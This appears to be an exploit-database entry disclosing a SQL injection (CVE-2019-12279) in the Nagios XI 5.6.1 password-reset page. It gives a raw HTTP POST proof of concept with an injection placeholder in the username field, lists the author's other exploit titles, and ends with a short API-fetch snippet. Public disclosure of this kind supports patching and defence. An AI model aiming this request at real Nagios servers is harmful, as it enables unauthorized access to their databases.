Author: JameelNabbo
Platform: php
Release date: 2019-05-23
```
# Exploit Title: Nagiosxi username sql injection
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.nagios.com
# Software Link: https://www.nagios.com/products/nagios-xi/
# Version: xi-5.6.1
# Tested on: MacOSX
#CVE: CVE-2019-12279

POC:

POST /nagiosxi/login.php?forgotpass HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/nagiosxi/login.php?forgotpass
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Connection: close
Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
Upgrade-Insecure-Requests: 1

page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}
```

Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-06-04 | "IceWarp 10.4.4 - Local File Inclusion" | webapps | php | JameelNabbo |
2019-05-27 | "Deltek Maconomy 2.2.5 - Local File Inclusion" | webapps | multiple | JameelNabbo |
2019-05-23 | "Nagios XI 5.6.1 - SQL injection" | webapps | php | JameelNabbo |
2019-03-04 | "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" | webapps | hardware | JameelNabbo |
2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
2018-02-16 | "Twig < 2.4.4 - Server Side Template Injection" | webapps | php | JameelNabbo |

```python
import requests

# Fetch this exploit record (ID 46910) as JSON from the nmmapper API
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46910/?format=json')
```